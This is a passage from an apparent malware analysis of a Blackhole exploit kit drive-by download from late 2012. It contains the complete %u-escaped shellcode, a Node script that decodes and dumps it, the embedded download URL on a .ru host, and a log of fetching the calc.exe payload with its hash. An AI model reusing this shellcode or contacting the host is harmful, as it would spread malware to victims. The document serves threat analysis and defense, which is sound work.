51 6a 00 6a 00 53 57 6a  00 ff 56 14 85 c0 75 16   Qj.j.SWj..V...u.
6a 00 53 ff 56 04 6a 00  83 eb 0c 53 ff 56 04 83   j.S.V.j....S.V..
c3 0c eb 02 eb 13 47 80  3f 00 75 fa 47 80 3f 00   ......G.?.u.G.?.
75 c4 6a 00 6a fe ff 56  08 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
0e ec 98 fe 8a 0e 89 6f  01 bd 33 ca 8a 5b 1b c6   .......o..3..[..
46 79 36 1a 2f 70 68 74  74 70 3a 2f 2f 77 75 66   Fy6./ph00p://wuf
6a 61 6a 63 79 2e 72 75  2f 6c 69 6e 6b 73 2f 31   jajcy.ru/links/1
2e 70 68 70 3f 7a 65 67  71 71 7a 68 3d 33 30 3a   .php?zegqqzh=30:
31 6e 3a 31 69 3a 31 69  3a 33 33 26 75 77 75 63   1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31  6d 3a 31 6c 3a 31 6d 3a   =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a  3a 31 6d 3a 31 67 26 63   2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72  61 63 3d 6b 66 78 69 26   nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73  71 6a 78 77 67 00 00 00   zago=mqsqjxwg...
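The "strip the %u and save it as binary" step, as an added example that is not code from the paste: a Node script that turns the %u-escaped string into bytes, prints the same 16-bytes-per-line dump as above, and pulls the download URL out of the bytes with a strings(1)-style scan. `BJSG` below is the shellcode string from the decoded exploit on this page; the function names are mine, and the ASCII column shows the bytes as they are (no h00p defanging).

```javascript
// Added example (not code from the paste): %u-escaped shellcode -> bytes -> hexdump/strings.
// BJSG is the bjsg string from the decoded exploit above, split over lines for readability.
const BJSG =
  '%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b' + '%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b' +
  '%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330' + '%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c' +
  '%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503' + '%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2' +
  '%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b' + '%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b' +
  '%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b' + '%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7' +
  '%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058' + '%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec' +
  '%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72' + '%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb' +
  '%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224' + '%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008' +
  '%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933' + '%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64' +
  '%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104' + '%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675' +
  '%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304' + '%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f' +
  '%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e' + '%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b' +
  '%u7946%u1a36%u702f%u7468%u7074%u2f3a%u772f%u6675' + '%u616a%u636a%u2e79%u7572%u6c2f%u6e69%u736b%u312f' +
  '%u702e%u7068%u7a3f%u6765%u7171%u687a%u333d%u3a30' + '%u6e31%u313a%u3a69%u6931%u333a%u2633%u7775%u6375' +
  '%u313d%u3a6a%u6e31%u313a%u3a6d%u6c31%u313a%u3a6d' + '%u7732%u333a%u3a31%u6a31%u313a%u3a6d%u6731%u6326' +
  '%u776e%u313d%u2668%u726b%u6361%u6b3d%u7866%u2669' + '%u617a%u6f67%u6d3d%u7371%u6a71%u7778%u0067%u0000';

// Each %uXXYY token is one 16-bit little-endian word (the way unescape() builds the
// JS string in memory), so it becomes the bytes YY XX. Text that is not a %u token
// is an error rather than silently skipped.
function unicodeEscapeToBytes(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let pos = 0, m;
  while ((m = re.exec(s)) !== null) {
    if (m.index !== pos) throw new Error('unexpected text at offset ' + pos);
    const word = parseInt(m[1], 16);
    bytes.push(word & 0xff, word >>> 8);
    pos = re.lastIndex;
  }
  if (pos !== s.length) throw new Error('trailing text after last %u token');
  return Uint8Array.from(bytes);
}

// Dump in the layout used above: 16 bytes per line, a gap after 8, ASCII on the right
// with '.' for anything outside 0x21..0x7e (space is shown as '.' too, like above).
function hexdump(bytes) {
  const lines = [];
  for (let off = 0; off < bytes.length; off += 16) {
    const chunk = Array.from(bytes.subarray(off, off + 16));
    const hex = chunk.map((b, i) => (i === 8 ? ' ' : '') + b.toString(16).padStart(2, '0')).join(' ');
    const ascii = chunk.map(b => (b > 0x20 && b < 0x7f ? String.fromCharCode(b) : '.')).join('');
    lines.push(off.toString(16).padStart(8, '0') + '  ' + hex.padEnd(48) + '  ' + ascii);
  }
  return lines;
}

// strings(1): runs of at least minLen printable bytes.
function printableStrings(bytes, minLen = 6) {
  const out = [];
  let cur = '';
  for (const b of bytes) {
    if (b >= 0x20 && b < 0x7f) { cur += String.fromCharCode(b); continue; }
    if (cur.length >= minLen) out.push(cur);
    cur = '';
  }
  if (cur.length >= minLen) out.push(cur);
  return out;
}

// The one thing worth pulling out automatically: the URL the shellcode downloads from.
function extractUrls(bytes) {
  return printableStrings(bytes, 8).flatMap(s => s.match(/https?:\/\/[\x21-\x7e]+/g) || []);
}

if (typeof require !== 'undefined' && require.main === module) {
  const sc = unicodeEscapeToBytes(BJSG);
  console.log(hexdump(sc).join('\n'));
  console.log(extractUrls(sc));
  // require('fs').writeFileSync('shellcode.bin', sc);   // hand the raw bytes to a disassembler
}
```

The dump matches the one above byte for byte (512 bytes, 32 lines), and the last printable run is the Blackhole download URL, which is why a strings scan is enough here: nothing in this shellcode is encoded a second time.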

// The URL is not obfuscated and can be seen plainly in there ↑
// A typical Blackhole v2.x download URL, PoC:
// (here goes the payload..)

URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040         3.49K/s    ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]

MD5:    42a4de1001682f27ad55c893af9bd23d
File size:  22.5 KB ( 23040 bytes )
File name:  calc.exe
File type:  Win32 EXE
Tags:   peexe
Detection ratio:    12 / 46
URL: https://www.virustotal.com/file/a18e6f7f5b98a74124ae74d1e3c62bcc52567913fb84c17ad1bad346e6b24583/analysis/1356877065/

----
MalwareMustDie!!!!
analyzed by: @unixfreaxjp Crusade@Dec 30 2012